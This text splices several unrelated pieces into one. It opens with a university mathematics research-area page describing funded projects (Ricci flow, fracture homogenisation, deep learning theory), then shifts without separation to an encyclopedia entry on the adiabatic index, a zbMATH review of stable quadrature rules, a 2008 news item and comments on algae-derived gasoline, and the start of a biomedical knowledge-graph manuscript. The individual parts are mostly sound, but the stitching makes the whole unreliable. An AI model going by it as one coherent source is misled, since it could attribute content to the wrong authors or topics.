# Models and Approximations
### Research Focus Area C
Alsmeyer, Böhm, Dereich, Engwer, Friedrich, Hille, Holzegel (seit 2020), Huesmann, Jentzen, Kabluchko, Lohkamp, Löwe, Mukherjee, Ohlberger, Rave, Schedensack (bis 2019), F. Schindler, Schlichting (seit 2020), Seis, Stevens, Wilking, Wirth, Wulkenhaar, Zeppieri.
Applications from the natural and life sciences define the challenges in this research focus area. We aim at developing and analysing fundamental dynamical and geometric modelling and approximation approaches for the description of deterministic and stochastic systems. For example, we investigate the interplay of macroscopic structures with underlying microscopic processes and their respective topological and geometric properties. A further focus is the investigation, exploitation, and optimization of the geometry underlying mathematical models. We study structural connections between different mathematical concepts, such as between solution manifolds of partial differential equations and non-linear interpolation, or between different metric, variational, or multiscale notions of convergence for geometries. In particular, we aim at characterizing the distinctive geometric properties of mathematical models and their approximations.
## Further Research Projects of Members of Research Focus Area C
$\bullet$ Christian Engwer: Personalised diagnosis and treatment for refractory focal paediatric and adult epilepsy (2021-2024)
$\bullet$ Benedikt Wirth: CRC 1450 A05 - Targeting immune cell dynamics by longitudinal whole-body imaging and mathematical modelling (2021-2024)
We develop strategies for tracking and quantifying (immune) cell populations or even single cells in long-term (days) whole-body PET studies in mice and humans. This will be achieved through novel acquisition protocols, measured and simulated phantom data, use of prior information from MRI and microscopy, mathematical modelling, and mathematical analysis of image reconstruction with novel regularization paradigms based on optimal transport. Particular applications include imaging and tracking of macrophages and neutrophils following myocardial ischemia-reperfusion or in arthritis and sepsis.
$\bullet$ Benedikt Wirth: CRC 1450 A06 - Improving intravital microscopy of inflammatory cell response by active motion compensation using controlled adaptive optics (2021-2024)
We will advance multiphoton fluorescence microscopy by developing a novel optical module comprising a high-speed deformable mirror that will actively compensate for tissue motion during intravital imaging, for instance due to heart beat (8 Hz), breathing (3 Hz, in the mm range) or peristaltic movement of the gut in mice. To control this module in real time, we will develop mathematical methods that track and predict tissue deformation. This will allow imaging of inflammatory processes at cellular resolution without mechanical tissue fixation.
$\bullet$ Caterina Zeppieri: SPP 2256: Variational Methods for Predicting Complex Phenomena in Engineering Structures and Materials - Subproject: Variational modelling of fracture in high-contrast microstructured materials: mathematical analysis and computational mechanics (2020-2023)
After the seminal work of Francfort and Marigo, free-discontinuity functionals of Mumford-Shah type have been established as simplified and yet relevant mathematical models to study fracture in brittle materials. For finite-contrast constituents, the homogenisation of brittle energies is by now well understood and provides a rigorous micro-to-macro upscaling for brittle fracture. Only recently, explicit high-contrast brittle microstructures have been provided which show that, already for simple free-discontinuity energies of Mumford-Shah type, the high-contrast nature of the constituents can induce a complex effective behaviour going beyond that of the single constituents. In particular, macroscopic cohesive-zone models and damage models can be obtained by homogenising purely brittle microscopic energies with high-contrast coefficients. In this framework, the simple-to-complex transition originates from a microscopic bulk-surface energy-coupling which is possible due to the degeneracy of the functionals.

Motivated by the need to understand the mathematical foundations of mechanical material failure and to develop computationally tractable numerical techniques, the main goal of this project is to characterise all possible materials which can be obtained by homogenising simple high-contrast brittle materials. In mathematical terms, this amounts to determining the variational-limit closure of the set of high-contrast free-discontinuity functionals. This problem has a long history in the setting of elasticity, whereas it is far less understood if fracture is allowed. For the variational analysis it will be crucial to determine novel homogenisation formulas which “quantify” the microscopic bulk-surface energy-coupling. Moreover, the effect of high-contrast constituents on macroscopic anisotropy will be investigated by providing explicit microstructures realising limit models with preferred crack directions.

The relevant mathematical tools will come from the Calculus of Variations and Geometric Measure Theory. Along the way, new ad hoc extension and approximation results for SBV-functions will be established. The latter will be of mathematical interest in their own right and appear to be widely applicable in the analysis of scale-dependent free-discontinuity problems. The computational mechanics results will build upon the mathematical theory and will complement it with relevant insights where the analysis becomes impracticable. High-performance fast Fourier transform and adaptive tree-based computational methods will be developed to evaluate the novel cell formulas. The identified damage and cohesive-zone models will be transferred to simulations on the component scale. The findings are expected to significantly enhance the understanding of the sources and mechanisms of material failure and to provide computational tools for identifying anisotropic material models useful for estimating the strength of industrial components.
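For orientation, the free-discontinuity functionals of Mumford-Shah type mentioned above have, in their simplest scalar form (a textbook sketch, not the project's specific high-contrast energy), the structure

$$E(u,K) \;=\; \int_{\Omega \setminus K} |\nabla u|^2 \, dx \;+\; \beta\, \mathcal{H}^{n-1}(K),$$

where $u$ is the displacement, $K$ the crack set, and $\mathcal{H}^{n-1}$ the surface measure of the crack; "high contrast" refers to bulk and surface coefficients that differ by orders of magnitude between the constituents.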
$\bullet$ Christoph Böhm, Burkhard Wilking: CRC 1442: Geometry: Deformation and Rigidity - Geometric evolution equations (2020-2024)
Hamilton’s Ricci flow is a geometric evolution equation on the space of Riemannian metrics of a smooth manifold. In a first subproject we would like to show a differentiable stability result for non-collapsed converging sequences of Riemannian manifolds with nonnegative sectional curvature, generalising Perelman’s topological stability. In a second subproject, in addition to classifying homogeneous Ricci solitons on non-compact homogeneous spaces, we would like to prove the dynamical Alekseevskii conjecture. Finally, in a third subproject we would like to find new Ricci flow invariant curvature conditions, a starting point for introducing a Ricci flow with surgery in higher dimensions.
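For reference, Hamilton's Ricci flow evolves a one-parameter family of Riemannian metrics $g(t)$ according to

$$\partial_t\, g(t) \;=\; -2\,\operatorname{Ric}\big(g(t)\big),$$

and Ricci solitons are the self-similar solutions of this flow, which change only by scaling and diffeomorphisms.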
$\bullet$ Raimar Wulkenhaar: CRC 1442: Geometry: Deformation and Rigidity - D03: Integrability (2020-2024)
The project investigates a novel integrable system which arises from a quantum field theory on noncommutative geometry. It is characterised by a recursive system of equations with conjecturally rational solutions. The goal is to deduce their generating function and to relate the rational coefficients in the generating function to intersection numbers of tautological characteristic classes on some moduli space.
$\bullet$ Michael Wiemeler, Burkhard Wilking: CRC 1442: Geometry: Deformation and Rigidity - B01: Curvature and Symmetry (2020-2024)
The question of how far geometric properties of a manifold determine its global topology is a classical problem in global differential geometry. In a first subproject we study the topology of positively curved manifolds with torus symmetry. We think that the methods used in this subproject can also be used to attack the Salamon conjecture for positive quaternionic Kähler manifolds. In a third subproject we study fundamental groups of non-negatively curved manifolds. Two other subprojects are concerned with the classification of manifolds all of whose geodesics are closed and the existence of closed geodesics on Riemannian orbifolds.
$\bullet$ Manuel Friedrich: Variational Modeling of Molecular Geometries (2020-2023)
Wider research context: Driven by their fascinating electronic and mechanical properties, research on low-dimensional materials (such as graphene) is growing exponentially. New findings are emerging at an ever increasing pace, ranging from fundamental concepts to applications. In contrast to the wealth of experimental and numerical evidence currently available, rigorous mathematical results on local and global crystalline geometries are scant, and the study of the emergence of different scales within molecular structures is still in its infancy.

Objectives: We focus on the variational modeling of molecular geometries within the frame of Molecular Mechanics: effective configurations are identified as minimizers of classical configurational potentials. The project aims at obtaining new mathematical understanding of molecular geometries and at investigating the emergence of scale effects across scales.

Approach: Ranging from the nano to the macroscale, we address crystallization for molecular compounds, the description of local molecular features including defects and rigidity, the occurrence of global geometric characteristics such as flatness in 3d and stratification, and the passage from discrete to continuum theories. Grounded on variational methods for atomistic models, the methodology will integrate techniques from discrete mathematics and stochastics as well.

Innovation: The project targets a number of hot research fronts in Materials Science from the rigorous mathematical standpoint. Compared with simulations, the theoretical approach bears the advantage of being system-size independent, a crucial asset for investigating effects across scales.

Researchers involved: The new international research team between Münster and Vienna will be coordinated by Manuel Friedrich and Ulisse Stefanelli and will benefit from a network of local and international collaborators, including experimental and computational groups.
$\bullet$ Mario Ohlberger, Felix Schindler: ML-MORE: Machine learning and model order reduction to predict the efficiency of catalytic filters. Subproject 1: Model Order Reduction (2020-2023)
Reactive transport in porous media coupled with catalytic reactions is the basis of many industrial processes and devices, such as fuel cells, photovoltaic cells, catalytic filters for exhaust gases, etc. Modelling and simulation of the processes at the pore scale can help to optimize the design of catalytic components and the process control, but is currently limited by the fact that such simulations produce large amounts of data, are time-consuming, and depend on a large number of parameters. Moreover, the experimental data collected over the years are not reused in this way. Developing solution approaches for predicting the chemical conversion rate with modern data-based machine learning (ML) methods is essential to arrive at fast, reliable predictive models. Several classes of methods are required for this. In addition to the experimental data, fully resolved pore-scale simulations are necessary. These, however, are too expensive to generate an extensive set of training data, so model order reduction (MOR) is crucial for acceleration. Reduced models for the instationary reactive transport under consideration are developed in order to simulate large amounts of training data. As the ML methodology, multilayer kernel-based learning methods are developed to calibrate the heterogeneous data and to build nonlinear predictive models for efficiency prediction. Large data (in terms of dimensionality and number of samples) will have to be handled, which will require data compression and parallelization of the training. The main goal of the project is to integrate all of the above developments into a predictive ML tool that supports industry in the development of new catalytic filters and is transferable to many other comparable processes.
$\bullet$ Christian Seis: Transport Equations, mixing and fluid dynamics (2020-2023)
Advection-diffusion equations are of fundamental importance in many areas of science. They describe systems in which a quantity is simultaneously diffused and advected by a velocity field. In many applications these velocity fields are highly irregular. In this project, several quantitative aspects shall be investigated. One is related to mixing properties in fluids caused by shear flows. The interplay between the transport by the shear flow and the regularizing diffusion leads, after a certain time, to the emergence of dominant length scales which persist during the subsequent evolution and determine mixing rates. A rigorous understanding of these phenomena is desired. In addition, stability estimates for advection-diffusion equations will be derived. These shall give deep insight into how solutions depend on coefficients and data. The new results shall subsequently be applied to estimate the error generated by numerical finite-volume schemes approximating the model equations.
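The model equation in question is the advection-diffusion equation

$$\partial_t \theta + u \cdot \nabla \theta \;=\; \kappa\, \Delta \theta,$$

for a scalar quantity $\theta$ transported by the velocity field $u$ and diffused with diffusivity $\kappa$; the mixing question above concerns the regime in which $u$ is a shear flow and $\kappa$ is small.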
$\bullet$ Christian Engwer: HyperCut – Stabilized DG schemes for hyperbolic conservation laws on cut cell meshes (2020-2022)
The goal of this project is to develop new tools for solving time-dependent, first-order hyperbolic conservation laws, in particular the compressible Euler equations, on complex-shaped domains. In practical applications, mesh generation is a major issue. When dealing with complicated geometries, the construction of corresponding body-fitted meshes is a very involved and time-consuming process. In this proposal, we will consider a different approach: in the last two decades, so-called cut cell methods have gained a lot of interest, as they reduce the burden of the meshing process. The idea is to simply cut the geometry out of a Cartesian background mesh. The resulting cut cells can have various shapes and are not bounded from below in size. Compared to body-fitted meshes, this approach is fully automatic and much cheaper. However, standard explicit schemes are typically not stable when the time step is chosen with respect to the background mesh and does not reflect the size of small cut cells. This is referred to as the small cell problem.

In the setting of standard meshes, both Finite Volume (FV) and Discontinuous Galerkin (DG) methods have been used successfully for solving non-linear hyperbolic conservation laws. For FV schemes, there already exist several approaches for extending these methods to cut cell meshes and overcoming the small cell problem while keeping the explicit time stepping. For DG schemes, this is not the case. The goal of this proposal is to develop stable DG schemes for solving time-dependent hyperbolic conservation laws, in particular the compressible Euler equations, on cut cell meshes using explicit time stepping. We particularly aim at a method that (1) solves the small cell problem and permits explicit time stepping, (2) preserves mass conservation, (3) is high-order along the cut cell boundary, where many important quantities are evaluated, (4) satisfies theoretical properties such as monotonicity and TVDM stability for model problems, (5) works for non-linear hyperbolic conservation laws, in particular the compressible Euler equations, (6) is robust in the presence of shocks or discontinuities, and (7) is sufficiently simple to be implemented in higher dimensions.

We base the spatial discretization on a DG approach to enable high accuracy. We plan to develop new stabilization terms to overcome the small cell problem for this setup. The starting point for this proposal is our recent publication on stabilizing a DG discretization for linear advection using piecewise linear polynomials. We will extend these results in different directions, namely to non-linear problems, including the compressible Euler equations, and to higher order, in particular to piecewise quadratic polynomials. We will implement these methods using the software framework DUNE and publish our code as open-source.
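To make the small cell problem concrete: for explicit time stepping, a generic CFL-type stability condition (a textbook form, not the project's specific estimate) requires

$$\Delta t \;\lesssim\; \min_K \frac{h_K}{|\lambda_{\max}|},$$

where $h_K$ is the size of cell $K$ and $\lambda_{\max}$ the fastest wave speed. Since cut cells are not bounded from below in size, $h_K$ can become arbitrarily small, forcing an arbitrarily small global time step unless the scheme is stabilized.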
$\bullet$ Raimar Wulkenhaar: GRK 2149 - Starke und schwache Wechselwirkung - von Hadronen zu Dunkler Materie (2020-2024)
The Research Training Group (Graduiertenkolleg) 2149 "Strong and Weak Interactions - from Hadrons to Dark Matter", funded by the Deutsche Forschungsgemeinschaft, focuses on the close collaboration of theoretical and experimental nuclear, particle and astroparticle physicists, further supported by a mathematician and a computer scientist. This explicit cooperation is essential for the PhD topics of our Research Training Group.

Scientifically, this Research Training Group addresses questions at the forefront of our present knowledge of particle physics. In strong interactions we investigate questions of high complexity, such as the parton distributions in nuclear matter, the transition of the hot quark-gluon plasma into hadrons, or features of meson decays and spectroscopy. In weak interactions we pursue questions which are by definition more speculative and which go beyond the Standard Model of particle physics, particularly with regard to the nature of dark matter. We will confront theoretical predictions with direct searches for cold dark matter particles or for heavy neutrinos as well as with new particle searches at the LHC.

The pillars of our qualification programme are individual supervision and mentoring by one senior experimentalist and one senior theorist, topical lectures in physics and related fields (e.g. advanced computation), peer-to-peer training through active participation in two research groups, dedicated training in soft skills, and the promotion of research experience in the international community. We envisage early career steps through a transfer of responsibilities and international visibility with stays at external partner institutions. An important goal of this Research Training Group is to train a new generation of scientists who are not only successful specialists in their fields, but who have a broader training both in theoretical and experimental nuclear, particle and astroparticle physics.
$\bullet$ Caterina Zeppieri: Homogenisation and elliptic approximation of random free-discontinuity functionals (2020-2022)
Composite materials possess an incredibly complex microstructure. To reduce this complexity, reasonable idealizations have to be considered in materials modelling. Random composite materials represent a relevant class of such idealizations. Motivated by primary questions arising in the variational theory of fracture, the goal of this project is to study the large-scale behavior of random elastic composites which can undergo fracture. Mathematically, this amounts to developing a qualitative theory of stochastic homogenization for free-discontinuity functionals. This will be done by combining two approaches: a "direct" approach and an "indirect" approximation approach. The direct approach consists in extending the classical theory to the BV-setting. The approximation approach, instead, consists in proposing suitable elliptic phase-field approximations of random free-discontinuity functionals which can provide regular approximations of the homogenized coefficients.
$\bullet$ Benedikt Wirth: Mathematical reconstruction and modelling of the CAR T-cell distribution in vivo in a tumour model (2019-2023)
$\bullet$ Arnulf Jentzen, Benno Kuckuck: Mathematical Theory for Deep Learning (2019-2024)
It is the key goal of this project to provide a rigorous mathematical analysis for deep learning algorithms and thereby to establish mathematical theorems which explain the success and the limitations of deep learning algorithms. In particular, this project aims (i) to provide a mathematical theory for the high-dimensional approximation capacities of deep neural networks, (ii) to reveal suitable regular sequences of functions which can be approximated by deep neural networks, but not by shallow neural networks, without the curse of dimensionality, and (iii) to establish dimension-independent convergence rates for stochastic gradient descent optimization algorithms when employed to train deep neural networks with error constants which grow at most polynomially in the dimension.
$\bullet$ Arnulf Jentzen: Existence, uniqueness, and regularity properties of solutions of partial differential equations (2019-2024)
The goal of this project is to reveal existence, uniqueness, and regularity properties of solutions of partial differential equations (PDEs). In particular, we intend to study existence, uniqueness, and regularity properties of viscosity solutions of degenerate semilinear Kolmogorov PDEs of the parabolic type. We plan to investigate such PDEs by means of probabilistic representations of the Feynman-Kac type. We also intend to study the connections of such PDEs to optimal control problems.
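The probabilistic representations referred to above are of the standard Feynman-Kac form: under suitable assumptions, the solution of the terminal value problem for a Kolmogorov backward PDE can be written as

$$u(t,x) \;=\; \mathbb{E}\big[\varphi\big(X_T^{t,x}\big)\big], \qquad dX_s^{t,x} = \mu\big(X_s^{t,x}\big)\,ds + \sigma\big(X_s^{t,x}\big)\,dW_s, \quad X_t^{t,x} = x,$$

where $W$ is a Brownian motion and $\varphi$ the terminal condition; regularity of $u$ can then be studied through properties of the associated stochastic differential equation.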
$\bullet$ Arnulf Jentzen: Regularity properties and approximations for stochastic ordinary and partial differential equations with non-globally Lipschitz continuous nonlinearities (2019-2024)
A number of stochastic ordinary and partial differential equations from the literature (such as, for example, the Heston and the 3/2-model from financial engineering, (overdamped) Langevin-type equations from molecular dynamics, stochastic spatially extended FitzHugh-Nagumo systems from neurobiology, stochastic Navier-Stokes equations, and Cahn-Hilliard-Cook equations) contain non-globally Lipschitz continuous nonlinearities in their drift or diffusion coefficients. A central aim of this project is to investigate regularity properties with respect to the initial values of such stochastic differential equations in a systematic way. A further goal of this project is to analyze the regularity of solutions of the deterministic Kolmogorov partial differential equations associated to such stochastic differential equations. Another aim of this project is to analyze weak and strong convergence and convergence rates of numerical approximations for such stochastic differential equations.
$\bullet$ Arnulf Jentzen: Overcoming the curse of dimensionality: stochastic algorithms for high-dimensional partial differential equations (2019-2024)
Partial differential equations (PDEs) are among the most universal tools used in modeling problems in nature and man-made complex systems. The PDEs appearing in applications are often high dimensional. Such PDEs can typically not be solved explicitly, and developing efficient numerical algorithms for high dimensional PDEs is one of the most challenging tasks in applied mathematics. As is well known, the difficulty lies in the so-called "curse of dimensionality": the computational effort of standard approximation algorithms grows exponentially in the dimension of the considered PDE. It is the key objective of this research project to overcome this curse of dimensionality and to construct and analyze new approximation algorithms which solve high dimensional PDEs with a computational effort that grows at most polynomially in both the dimension of the PDE and the reciprocal of the prescribed approximation precision.
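A minimal illustration of why stochastic algorithms can beat the curse of dimensionality (a generic Monte Carlo sketch, not one of the project's algorithms): the statistical error of averaging $n$ samples decays like $n^{-1/2}$ regardless of the dimension $d$, in contrast to grid-based methods whose cost grows exponentially in $d$.

```python
import numpy as np

# Monte Carlo estimate of E[f(X)] for X uniform on [0,1]^d.
# The root-mean-square error decays like n**(-1/2) independently of d,
# whereas a tensor grid with m points per axis costs m**d evaluations.
def mc_estimate(f, d, n, rng):
    x = rng.random((n, d))  # n i.i.d. samples in [0,1]^d
    return f(x).mean()

rng = np.random.default_rng(0)
f = lambda x: np.cos(x.sum(axis=1) / np.sqrt(x.shape[1]))  # example integrand
for d in (10, 100, 1000):
    print(d, mc_estimate(f, d, n=100_000, rng=rng))
```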
$\bullet$ Benedikt Wirth: SPP 1962: Non-smooth and Complementarity-Based Distributed Parameter Systems: Simulation and Hierarchical Optimization - SP: Non-smooth and non-convex optimal transport problems (2019-2022)
In recent years a strong interest has developed within mathematics in so-called "branched transport" models, which make it possible to describe transportation networks as they occur in road systems, river basins, communication networks, vasculature, and many other natural and artificial contexts. As in classical optimal transport, an amount of material needs to be transported efficiently from a given initial to a final mass distribution. In branched transport, however, the transportation cost is not proportional, but subadditive in the transported mass, modelling an increased transport efficiency if mass is transported in bulk. This automatically favours transportation schemes in which the mass flux concentrates on a complicated, ramified network of one-dimensional lines. The branched transport problem is an intricate nonconvex, nonsmooth variational problem on Radon measures (in fact on normal currents) that describe the mass flux. Various formulations were developed and analysed (including work by the PIs); however, they all take the viewpoint of geometric measure theory, working with flat chains, probability measures on the space of Lipschitz curves, or the like. What is completely lacking is an optimization and optimal control perspective (even though some ideas of optimization shimmer through in the existing variational arguments, such as regularity analysis via necessary optimality conditions or the concept of calibrations, which is related to dual optimization variables). This situation is also reflected in the fact that the field of numerics for branched transport is rather underdeveloped and consists of ad hoc graph optimization methods for special cases and two-dimensional phase field approximations. We will reformulate branched transport in the framework of optimization and optimal control for Radon measures, work out this optimization viewpoint in the variational analysis of branched transport networks, and exploit the results in novel numerical approaches. The new perspective will at the same time help variational analysts, advance the understanding of nonsmooth, nonconvex optimization problems on measures, and provide numerical methods to obtain efficient transport networks.
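The subadditive cost is made explicit by the standard branched transport (Gilbert) energy, given here as a sketch in its simplest form: a mass flux of intensity $\theta$ concentrated on a one-dimensional network $\Sigma$ pays

$$E(\theta) \;=\; \int_{\Sigma} \theta^{\alpha} \, d\mathcal{H}^{1}, \qquad 0 \le \alpha < 1,$$

and since $(m_1 + m_2)^{\alpha} < m_1^{\alpha} + m_2^{\alpha}$ for positive masses, moving mass in bulk along shared edges is strictly cheaper than moving it separately.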
$\bullet$ Mario Ohlberger, Felix Schindler, Tim Keil: Localized Reduced Basis Methods for PDE-constrained Parameter Optimization (2019-2021)
This project is concerned with model reduction for parameter optimization of nonlinear elliptic partial differential equations (PDEs). The goal is to develop a new paradigm for PDE-constrained optimization based on adaptive online enrichment. The essential idea is to design a localized version of the reduced basis (RB) method, called the Localized Reduced Basis Method (LRBM).
$\bullet$ Benedikt Wirth: Nonlocal Methods for Arbitrary Data Sources (2018-2022)
In NoMADS we focus on data processing and analysis techniques which can feature potentially very complex, nonlocal, relationships within the data. In this context, methodologies such as spectral clustering, graph partitioning, and convolutional neural networks have gained increasing attention in computer science and engineering within the last years, mainly from a combinatorial point of view. However, the use of nonlocal methods is often still restricted to academic pet projects. There is a large gap between the academic theories for nonlocal methods and their practical application to real-world problems. The reason these methods work so well in practice is far from fully understood.
Our aim is to bring together a strong international group of researchers from mathematics (applied and computational analysis, statistics, and optimisation), computer vision, biomedical imaging, and remote sensing, to fill the current gaps between theory and applications of nonlocal methods. We will study discrete and continuous limits of nonlocal models by means of mathematical analysis and optimisation techniques, resulting in investigations on scale-independent properties of such methods, such as imposed smoothness of these models and their stability to noisy input data, as well as the development of resolution-independent, efficient and reliable computational techniques which scale well with the size of the input data. As an overarching applied theme we focus in particular on image data arising in biology and medicine, which offers a rich playground for structured data processing and has direct impact on society, as well as discrete point clouds, which represent an ambitious target for unstructured data processing. Our long-term vision is to discover fundamental mathematical principles for the characterisation of nonlocal operators, the development of new robust and efficient algorithms, and the implementation of those in high quality software products for real-world application.
$\bullet$ Mario Ohlberger, Stephan Rave, Marie Christin Tacke: Model-based estimation of the lifetime of aged Li-ion batteries for second-life use as stationary electricity storage (2018-2021)
# Ratio of specific heats
The ratio of specific heats (also known as adiabatic index), usually denoted by $\gamma$, is the ratio of specific heat at constant pressure to the specific heat at constant volume.
$\gamma \equiv \frac{C_p}{C_v}$
The adiabatic index always exceeds unity; for a polytropic gas it is constant. For a monatomic gas $\gamma=5/3$, and for diatomic gases $\gamma=7/5$, at ordinary temperatures. For air its value is close to that of a diatomic gas, 7/5 = 1.4.
Sometimes $\kappa$ is used instead of $\gamma$ to denote the specific heat ratio.
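A quick sanity check of the quoted values via the kinetic-theory relation $\gamma = (f+2)/f$ for an ideal gas with $f$ active degrees of freedom (an illustrative addition, not part of the original article):

```python
# gamma = (f + 2) / f for an ideal gas with f active degrees of freedom
def gamma(f: int) -> float:
    return (f + 2) / f

print(gamma(3))  # monatomic gas (translation only): 5/3 ~ 1.667
print(gamma(5))  # diatomic gas at ordinary temperatures: 7/5 = 1.4
```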
# zbMATH — the first resource for mathematics
Stable high-order quadrature rules with equidistant points. (English) Zbl 1170.65016
Newton-Cotes quadrature rules become unstable for high orders. In this paper, the author reviews two techniques to construct stable high-order quadrature rules using $N$ equidistant quadrature points. The first method is based on results of M. W. Wilson [Math. Comput. 24, 271–282 (1970; Zbl 0219.65028)]. The second approach uses the nonnegative least squares method of C. L. Lawson and R. J. Hanson [Solving least squares problems, SIAM, Philadelphia (1995; Zbl 0860.65029)]. The stability follows from the fact that all weights are positive. These results can be achieved in the case $N \sim d^2$, where $d$ is the polynomial order of accuracy. The computed approximation then corresponds implicitly to the integral of a (discrete) least squares approximation of the (sampled) integrand. The author shows how the underlying discrete least squares approximation can be optimized for the numerical integration. Numerical tests are presented.
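A small sketch of the second approach reviewed above, with our own illustrative choices (interval $[-1,1]$, monomial basis): solve the moment equations at $N$ equidistant points by nonnegative least squares, so that all weights are nonnegative by construction.

```python
import numpy as np
from scipy.optimize import nnls

# Nonnegative least squares (Lawson-Hanson) applied to the moment
# equations at N equidistant points; nonnegative weights give stability.
d = 8                        # polynomial order of accuracy
N = d * d                    # N ~ d^2 equidistant points
x = np.linspace(-1.0, 1.0, N)
A = np.vander(x, d + 1, increasing=True).T   # A[i, j] = x[j]**i
b = np.array([(1.0 - (-1.0) ** (i + 1)) / (i + 1) for i in range(d + 1)])
w, residual = nnls(A, b)     # weights w >= 0 by construction
print(w.sum(), residual)     # weights sum to the interval length 2
```

Since a nonnegative exact solution exists for $N \sim d^2$ by the results reviewed above, the residual should come out numerically zero; the positivity of the weights is what guarantees stability.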
##### MSC:
- 65D32 Quadrature and cubature formulas (numerical methods)
- 41A55 Approximate quadratures
- 42C05 General theory of orthogonal functions and polynomials
- 65F20 Overdetermined systems, pseudoinverses (numerical linear algebra)
## Sapphire Energy Introduces Algae-Derived Bio-Gasoline
##### 29 May 2008
Start-up algal biofuels company Sapphire Energy unveiled a renewable 91-octane gasoline, derived from an algal biocrude, that conforms to ASTM certification.
Sapphire has developed a platform that produces a “green crude” and biohydrocarbon fuels from modified algae. Sapphire’s founders and leadership team includes scientists in the fields of petroleum chemistry, biotechnology, algal production, plant genomics, and biogenetics.
Brian Goodall, Sapphire’s new vice president of downstream technology, was most recently at Imperium Renewables, where his team delivered the 1,000 gallons of biojet fuel used on Virgin Atlantic’s first-ever commercial “green” jet flight. (Earlier post.)
The one-year-old San Diego, California-based Sapphire has already gathered $50 million in funding from investors, including ARCH Venture Partners, the Wellcome Trust, and Venrock. Sapphire’s scientific supporters include the Scripps Research Institute; the University of California, San Diego; the University of Tulsa; and the Department of Energy’s Joint Genome Project.

### Comments

This sounds doggone promising if their claims can be believed. I checked out their website. They have a lot of impressive résumés, but I wonder about the cost of building the algae farms, etc. Does their plan sound feasible to anyone out there?

Music to my ears. And they're local to me. C'mon, let's get this stuff to market!

Too bad it's already been shown that algal bio-fuels should be scrapped because they can't be done economically. ... wait a minute ... that was at $30 a barrel. Holy profit margin, Batman!
If you can grow algae hydroponically (i.e. nutrient solutions without need for soil) in areas where land and soil conditions aren't conducive to farming for corn or wheat, this would be a good answer to the biofuels versus people-food problem.
Sewage would be an excellent source of nutrients. Is there not at least one company trying to use it?
there are a couple other companies looking at waste water Blue Marble Energy has been for quite some time now as well as Aquaflow.
Sapphire's method of conversion will be the standard for how to convert algae to energy; the notion of oil extraction from algae will be dead in the water, so to speak, within a year. I could be wrong, but essentially that would be the foolish method to pursue.
On another note, Sapphire just appears to be one of the first to market, but they are not the only ones looking at bio-crude conversions; more will soon follow.
The question really is, how much can they produce per day? What is the EROI? The news stories did nothing to answer these fundamental questions.
Shouldn't they focus on a diesel fuel replacement first? All the other algae research seems to come to the conclusion that is the most viable use.
Once again, no specifics: the amount or quality of land required per litre. Experimentation with jatropha genome mapping sounds more promising.
Take a problem
Turn it into an asset
Make money doing it.
Sounds win win win to me.
Lots of impressive cred from the players. Now to see if they can build a pilot that actually works. While this appears to be a great thing, I wonder how well they've done their homework on building a fuel for a decreasing need? As ESSUs become more sophisticated, the need to drop by the neighborhood Esso station rapidly decreases. And while there will always be a need for liquid fuels, gasoline - green or otherwise - will steadily decline compared to jet fuel and diesel.
Even so, it appears that algae is *finally* having its day in the um, sunlight. Thanks in part to the "innovative" work of DOE's Aquatic Species study a while ago.
I just hope none of the GM organisms turn out to like human flesh as much as CO2 and sunlight.
These guys better get a move on. At the rate my heating oil is going up, I may need to take out a second house loan to fill my fuel tank.
Regarding funding to get this project going...

Imagine if they were an NFL team threatening to move out of town... the state govt. and local officials would be on DefCon Three, panicking and throwing 200 mil plus at them... not to mention tax breaks out the wazoo to build them a new playpen and keep the unwashed amused in the fall... Why isn't the state taking the lead with this and doing as we did in WW2? In months, factories went from toothpaste and lawn mowers to grenades and bayonets etc. It didn't take 10 years, and it won't if we get on it now!

Where is the sense of urgency?

Yes, I know this is a high-tech issue, but the point is the same... where is the will to bear the burden to win??
SIR,

I am a student of the B.Tech-M.Tech Int. programme in converging technologies at the Centre for Converging Technologies, University of Rajasthan, Jaipur, India.

I am making a project on this. I request you to please send me "How can we take out energy from algae?" This would be a great help to mankind.
We have heard the talk; now where is the product? Where can I get 25 gallons to try? I see nothing but research, research. Let's go, folks, we need to stop the cash drain on foreign oil.
The comments to this entry are closed.
# Expanding a Database-derived Biomedical Knowledge Graph via Multi-relation Extraction from Biomedical Abstracts
A DOI-citable version of this manuscript is available at https://doi.org/10.1101/730085.
This manuscript (permalink) was automatically generated from greenelab/text_mined_hetnet_manuscript@1149d5d on January 29, 2020.
## Authors
• David N. Nicholson
0000-0003-0002-5761 · danich1
Department of Systems Pharmacology and Translational Therapeutics, University of Pennsylvania · Funded by GBMF4552
• Daniel S. Himmelstein
0000-0002-3012-7446 · dhimmel · dhimmel
Department of Systems Pharmacology and Translational Therapeutics, University of Pennsylvania · Funded by GBMF4552
• Casey S. Greene
0000-0001-8713-9213 · cgreene · GreeneScientist
Department of Systems Pharmacology and Translational Therapeutics, University of Pennsylvania · Funded by GBMF4552 and R01 HG010067
## Abstract
Knowledge graphs support multiple research efforts by providing contextual information for biomedical entities, constructing networks, and supporting the interpretation of high-throughput analyses. These databases are populated via some form of manual curation, which is difficult to scale in the context of an increasing publication rate. Data programming is a paradigm that circumvents this arduous manual process by combining databases with simple rules and heuristics written as label functions, which are programs designed to automatically annotate textual data. Unfortunately, writing a useful label function requires substantial error analysis and is a nontrivial task that takes multiple days per function. This makes populating a knowledge graph with multiple node and edge types practically infeasible. We sought to accelerate the label function creation process by evaluating the extent to which label functions could be re-used across multiple edge types. We used a subset of an existing knowledge graph centered on disease, compound, and gene entities to evaluate label function re-use. We determined the best label function combination by comparing a baseline database-only model with the same model augmented with edge-specific or edge-mismatch label functions. We confirmed that adding edge-specific rather than edge-mismatch label functions often improves text annotation and showed that this approach can incorporate novel edges into our source knowledge graph. We expect that continued development of this strategy has the potential to swiftly populate knowledge graphs with new discoveries, ensuring that these resources include cutting-edge results.
## Introduction
Knowledge bases are important resources that hold complex structured and unstructured information. These resources have been used in important tasks such as network analysis for drug repurposing discovery [1,2,3] or as a source of training labels for text mining systems [4,5,6]. Populating knowledge bases often requires highly trained scientists to read biomedical literature and summarize the results [7]. This time-consuming process is referred to as manual curation. In 2007, researchers estimated that filling a knowledge base via manual curation would require approximately 8.4 years to complete [8]. The rate of publications continues to exponentially increase [9], so using only manual curation to fully populate a knowledge base has become impractical.
Relationship extraction has been studied as a solution towards handling the challenge posed by an exponentially growing body of literature [7]. This process consists of creating an expert system to automatically scan, detect and extract relationships from textual sources. Typically, these systems utilize machine learning techniques that require extensive corpora of well-labeled training data. These corpora are difficult to obtain, because they are constructed via extensive manual curation pipelines.
